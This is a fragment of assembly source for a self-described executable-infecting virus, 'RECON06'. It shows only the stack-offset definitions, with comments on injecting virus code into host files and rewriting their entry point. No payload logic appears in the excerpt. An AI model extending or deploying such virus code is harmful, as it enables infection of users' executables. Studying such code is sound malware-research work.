RECON06 . A PLATFORM INDEPENDENT MULTI-CAVITY NOP VIRUS
.equ last, -0x58 .equ lastJA, -0x5c # the address of the operand of the last jump instruction .equ vstart, -0x60 # where the virus begins, and where the new e_entry should be .equ new_e_entry, -0x64 # 'new' as in new host .equ newjmp_loc, -0x68 # for forward/backward jump calculations .equ oldjmp_loc, -0x6c .equ jmp_dist, -0x74 .equ oldopcode_pos, -0x78 .equ oldopcode, -0x7c .equ newopcode_pos, -0x80 .equ newopcode, -0x84 .equ oldsizes_parity, -0x88 .equ oldsizes_pos, -0x8c .equ oldsizes_cur, -0x90 .equ oldsizes, -0x94 .equ newsizes_pos, -0x98 .equ newsizes_parity, -0x9c .equ newsizes_cur, -0xa0 .equ name, -0x1a0 .equ newsizes, -0x600 # From the old infected executable, we copy the instruction sizes # to this allocation and later inser them into the new executable # one by one, just like we inject virus code.